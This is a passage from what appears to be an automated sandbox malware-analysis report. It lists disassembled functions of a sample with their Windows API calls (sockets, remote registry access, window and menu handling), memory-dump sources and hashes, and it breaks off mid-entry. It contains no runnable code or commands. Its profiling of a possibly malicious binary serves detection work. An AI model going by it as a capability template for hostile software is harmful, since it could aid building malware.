                                          • Instruction ID: ece6e2e3dd89c91429a0292b4749101945a4d40d11d0cc16ddbadf730c763575
                                          • Opcode Fuzzy Hash: 448aa7e50cc9840cc9f220d6f40b6564feb4a1bbe5b75cb4db7d2cc5edc9e28a
                                          • Instruction Fuzzy Hash: 8D313CB5901109BFDB15DF91DC89EFEB7BCEF09340F040169F901A2150EB749E859BA0
                                          Function 001368F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00136911
                                          • GetWindowLongW.USER32(00C055F0,000000F0), ref: 00136944
                                          • GetWindowLongW.USER32(00C055F0,000000F0), ref: 00136979
                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001369AB
                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001369D5
                                          • GetWindowLongW.USER32(?,000000F0), ref: 001369E6
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00136A00
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: f231c8191684297f7c120f6ca05109845b187c63623075a36114de732bb5414f
                                          • Instruction ID: 478f7b551ae3c847ba24318fe2075d1acb4311d713117d66cb968c5bf95fb752
                                          • Opcode Fuzzy Hash: f231c8191684297f7c120f6ca05109845b187c63623075a36114de732bb5414f
                                          • Instruction Fuzzy Hash: DF313235608154EFDB21CF19DC88F6437E1EB4A358F1981A4FA098F6B2CB72AC90CB51
                                          Function 0010E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E2CA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E2F0
                                          • SysAllocString.OLEAUT32(00000000), ref: 0010E2F3
                                          • SysAllocString.OLEAUT32(?), ref: 0010E311
                                          • SysFreeString.OLEAUT32(?), ref: 0010E31A
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0010E33F
                                          • SysAllocString.OLEAUT32(?), ref: 0010E34D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 706c7871465fe8556c7e751590c2441efc9dcf417673867439c56f4792ec1f1d
                                          • Instruction ID: 464c82283bf03500f93a3bb63dda35d00bd49f70b358e1a79707b8ec960a65b5
                                          • Opcode Fuzzy Hash: 706c7871465fe8556c7e751590c2441efc9dcf417673867439c56f4792ec1f1d
                                          • Instruction Fuzzy Hash: 74218676604219AFDB10DFA9DC88CBB77ECFB09360B044525FE54DB2A0D770AD818760
                                          Function 0012685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00128475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001268B1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 001268C0
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001268F9
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00126902
                                          • WSAGetLastError.WSOCK32 ref: 0012690C
                                          • closesocket.WSOCK32(00000000), ref: 00126935
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0012694E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 910771015-0
                                          • Opcode ID: 721fa4037db32660b3bbac482f529951e4871e8850fe4a7b60f79f00abc4d73f
                                          • Instruction ID: 337ee41a9adae277fe0cbc003d510d92d024094b9b9c86782142ef19ba7e04d1
                                          • Opcode Fuzzy Hash: 721fa4037db32660b3bbac482f529951e4871e8850fe4a7b60f79f00abc4d73f
                                          • Instruction Fuzzy Hash: E531E771600214AFDF10AF24DC85BBD77A9EB45725F044019FD05A72D2CB70AD54CBA1
                                          Function 0010E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E3A5
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E3CB
                                          • SysAllocString.OLEAUT32(00000000), ref: 0010E3CE
                                          • SysAllocString.OLEAUT32 ref: 0010E3EF
                                          • SysFreeString.OLEAUT32 ref: 0010E3F8
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0010E412
                                          • SysAllocString.OLEAUT32(?), ref: 0010E420
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: b6328c5abef501c91f15966c8a1f7f1b0d3e249c0f79a91bb12772b2d945027e
                                          • Instruction ID: eec096a9ea5460f93e640c5b597e199be60f809dbd9d3cdbe39c73748c9c52b4
                                          • Opcode Fuzzy Hash: b6328c5abef501c91f15966c8a1f7f1b0d3e249c0f79a91bb12772b2d945027e
                                          • Instruction Fuzzy Hash: 9B218B35604204AFDB149FA9DC88DAE77ECEB0D3607448529FA45CB2A1D770DC818764
                                          Function 00137BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                            • Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
                                            • Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00137C57
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00137C64
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00137C6F
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00137C7E
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00137C8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: c9ac71b49649b147b1dd135beba8fa395b8def73c458402e3e1e931cd5c31a35
                                          • Instruction ID: 908b351f5d768a5d36a9ab224917dcd9f65d9de3c4a9320a37e00afc5462f983
                                          • Opcode Fuzzy Hash: c9ac71b49649b147b1dd135beba8fa395b8def73c458402e3e1e931cd5c31a35
                                          • Instruction Fuzzy Hash: 1611B6B2140219BEEF158F60CC85EE77F5DEF09798F015114BB08A20A0C7719C61DBA0
                                          Function 000D9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __init_pointers.LIBCMT ref: 000D9D16
                                            • Part of subcall function 000D33B7: EncodePointer.KERNEL32(00000000), ref: 000D33BA
                                            • Part of subcall function 000D33B7: __initp_misc_winsig.LIBCMT ref: 000D33D5
                                            • Part of subcall function 000D33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000DA0D0
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000DA0E4
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000DA0F7
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000DA10A
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000DA11D
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000DA130
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000DA143
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000DA156
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000DA169
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000DA17C
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000DA18F
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000DA1A2
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000DA1B5
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000DA1C8
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000DA1DB
                                            • Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000DA1EE
                                          • __mtinitlocks.LIBCMT ref: 000D9D1B
                                          • __mtterm.LIBCMT ref: 000D9D24
                                            • Part of subcall function 000D9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000D9D29,000D7EFD,0016CD38,00000014), ref: 000D9E86
                                            • Part of subcall function 000D9D8C: _free.LIBCMT ref: 000D9E8D
                                            • Part of subcall function 000D9D8C: DeleteCriticalSection.KERNEL32(00170C00,?,?,000D9D29,000D7EFD,0016CD38,00000014), ref: 000D9EAF
                                          • __calloc_crt.LIBCMT ref: 000D9D49
                                          • __initptd.LIBCMT ref: 000D9D6B
                                          • GetCurrentThreadId.KERNEL32 ref: 000D9D72
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: b27b7e1ff2e1777eac08d8f3d9fb5395fd52c363ab43bed769a738d4cf96f9a5
                                          • Instruction ID: 72c3a32c41246610008dd5ac29b087cb333b1e9377d2129786e335060c866ac8
                                          • Opcode Fuzzy Hash: b27b7e1ff2e1777eac08d8f3d9fb5395fd52c363ab43bed769a738d4cf96f9a5
                                          • Instruction Fuzzy Hash: F8F090326197115AE7757B78BC036CA36D6DF42734F20462BF558D53D3EF10898181B1
                                          Function 000D41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000D4282,?), ref: 000D41D3
                                          • GetProcAddress.KERNEL32(00000000), ref: 000D41DA
                                          • EncodePointer.KERNEL32(00000000), ref: 000D41E6
                                          • DecodePointer.KERNEL32(00000001,000D4282,?), ref: 000D4203
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 3489934621-340411864
                                          • Opcode ID: 6c7ff513401fc3bb7d50124d47f899e33b249fecab7f530773b5f6af2535fd20
                                          • Instruction ID: 261dba7b024c0fdc5b3e94beacceaa28f5641ad83ad9fd6e525d62664e7b8bad
                                          • Opcode Fuzzy Hash: 6c7ff513401fc3bb7d50124d47f899e33b249fecab7f530773b5f6af2535fd20
                                          • Instruction Fuzzy Hash: 61E01A78A90701AFEB516FB1EC4DB083AA6BB1AB07FA04424BA15D59F0CBF540C5CF10
                                          Function 000D428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000D41A8), ref: 000D42A8
                                          • GetProcAddress.KERNEL32(00000000), ref: 000D42AF
                                          • EncodePointer.KERNEL32(00000000), ref: 000D42BA
                                          • DecodePointer.KERNEL32(000D41A8), ref: 000D42D5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 3489934621-2819208100
                                          • Opcode ID: babd2fffa6ddec7a6e6d4e805cec874f65c011d426b298448080341c6c9247e6
                                          • Instruction ID: 0b68b0fa8903023012db8855162bf9af63dd9969355b8662805656461e91d18a
                                          • Opcode Fuzzy Hash: babd2fffa6ddec7a6e6d4e805cec874f65c011d426b298448080341c6c9247e6
                                          • Instruction Fuzzy Hash: 33E0B674950B00AFEB529F61AD4DB543AB5B709B03FD00525F205D59F0CBF445C4DA10
                                          Function 000B218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 000B21B8
                                          • GetWindowRect.USER32(?,?), ref: 000B21F9
                                          • ScreenToClient.USER32(?,?), ref: 000B2221
                                          • GetClientRect.USER32(?,?), ref: 000B2350
                                          • GetWindowRect.USER32(?,?), ref: 000B2369
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Rect$Client$Window$Screen
                                          • String ID:
                                          • API String ID: 1296646539-0
                                          • Opcode ID: 56004f334c4552ab2bde25ff9a56683c6ab2f22f071a9fb399991b7d57e00661
                                          • Instruction ID: 0fd47c4f944ddf1a8f8046b6201f95e68e999b37d416d987bf7bed15914f156c
                                          • Opcode Fuzzy Hash: 56004f334c4552ab2bde25ff9a56683c6ab2f22f071a9fb399991b7d57e00661
                                          • Instruction Fuzzy Hash: FBB1383990024ADBDB60CFA9C9807EEB7F1FF08710F148529ED59EB254DB34AA50CB64
                                          Function 00116A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove$__itow__swprintf
                                          • String ID:
                                          • API String ID: 3253778849-0
                                          • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                          • Instruction ID: 193628e58f177182921f66acb549cf099ad597bf49fc7e22edaeb7ac7efbc00b
                                          • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                          • Instruction Fuzzy Hash: 1461B13150025AABCF19EF60CC81FFE37A9AF05308F054569F8955B293DB35AD85CBA4
                                          Function 00130844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013091D
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013095D
                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00130980
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001309A9
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001309EC
                                          • RegCloseKey.ADVAPI32(00000000), ref: 001309F9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                          • String ID:
                                          • API String ID: 4046560759-0
                                          • Opcode ID: 632ca38ce3853fed778922f1a7ebddaa98a059cb160b23726c66badf246e4a59
                                          • Instruction ID: 85baa0ef3de5f32106c0b2f715d741f0e108754e4b01435b0b814729b8bf45a3
                                          • Opcode Fuzzy Hash: 632ca38ce3853fed778922f1a7ebddaa98a059cb160b23726c66badf246e4a59
                                          • Instruction Fuzzy Hash: 79515731208200AFD715EF64C895EAEBBE9FF89314F04491DF5998B2A2DB31E905CB52
                                          Function 0010F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0010F6A2
                                          • VariantClear.OLEAUT32(00000013), ref: 0010F714
                                          • VariantClear.OLEAUT32(00000000), ref: 0010F76F
                                          • _memmove.LIBCMT ref: 0010F799
                                          • VariantClear.OLEAUT32(?), ref: 0010F7E6
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0010F814
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                          • String ID:
                                          • API String ID: 1101466143-0
                                          • Opcode ID: fa1fb9da28abb80dc9dfba5ac12943542ddee13163f7d0fc527af7d6bcb5b269
                                          • Instruction ID: 28431bb5bc49d096878818ffe847c23633b3592cf29f0a48f4430694888b3c3f
                                          • Opcode Fuzzy Hash: fa1fb9da28abb80dc9dfba5ac12943542ddee13163f7d0fc527af7d6bcb5b269
                                          • Instruction Fuzzy Hash: 14514D75A00209EFCB24CF58C884AAAB7B8FF4C314B15856AE959DB341D770E951CFA0
                                          Function 001129B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 001129FF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112A4A
                                          • IsMenu.USER32(00000000), ref: 00112A6A
                                          • CreatePopupMenu.USER32 ref: 00112A9E
                                          • GetMenuItemCount.USER32(000000FF), ref: 00112AFC
                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00112B2D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                          • String ID:
                                          • API String ID: 3311875123-0
                                          • Opcode ID: 92d0df429abb6da652b5b9af519c4066ee887898effe22ae20668a9c5d438987
                                          • Instruction ID: bc85813cd64ea27a20f9cc885644c81335735f984e1ebb25a533410317ca34f3
                                          • Opcode Fuzzy Hash: 92d0df429abb6da652b5b9af519c4066ee887898effe22ae20668a9c5d438987
                                          • Instruction Fuzzy Hash: E851DE7060434ADFCF29CF68E888BEEBBF5EF15314F104129E8129B2A1D77099A4CB51
                                          Function 000B1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 000B1B76
                                          • GetWindowRect.USER32(?,?), ref: 000B1BDA
                                          • ScreenToClient.USER32(?,?), ref: 000B1BF7
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000B1C08
                                          • EndPaint.USER32(?,?), ref: 000B1C52
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
